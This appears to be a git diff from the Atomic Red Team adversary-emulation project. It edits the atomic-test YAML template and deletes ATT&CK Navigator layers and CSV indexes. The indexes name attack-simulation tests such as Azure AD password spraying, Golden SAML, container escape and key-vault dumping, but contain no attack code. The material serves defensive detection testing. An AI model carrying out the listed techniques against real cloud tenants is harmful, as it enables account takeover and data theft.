- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
@@ -50,16 +46,9 @@ atomic_tests:
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
# - office-365
# - azure-ad
# - google-workspace
# - saas
# - iaas
# - containers
# - iaas:gcp
# - iaas:azure
# - iaas:aws
supported_platforms:
- windows
@@ -87,60 +76,63 @@ atomic_tests:
type: Url
default: 0000:00:30
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executor:
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - command_prompt, sh, bash, powershell, manual, aws, az, gcloud, kubectl
#
# Each of the above requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe, powershell.exe, sh or bash respectively
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# name: command_prompt
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# name: manual
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
@@ -150,27 +142,23 @@ atomic_tests:
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- linux
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executor:
name: bash
executors:
- name: bash
command: echo "Hello world!"
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure - adding user to Azure AD role\n- Azure - adding service principal to Azure AD role\n- AzureAD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":1,"enabled":true,"comment":"\n- ExecIntoContainer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1562","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/azure-ad-index.csv
-12
View File
@@ -1,12 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
3 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
4 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
5 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
6 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
7 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
8 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
9 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
10 persistence T1098 Account Manipulation 4 Azure - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
11 persistence T1098 Account Manipulation 5 Azure - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
12 persistence T1098 Account Manipulation 8 AzureAD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
atomics/Indexes/Indexes-CSV/containers-index.csv
-11
View File
@@ -1,11 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1552.007 Kubernetes List Secrets 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
3 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
4 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
5 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
6 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
7 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
8 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
9 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
10 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
11 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
atomics/Indexes/Indexes-CSV/google-workspace-index.csv
-5
View File
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
3 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
4 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
5 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
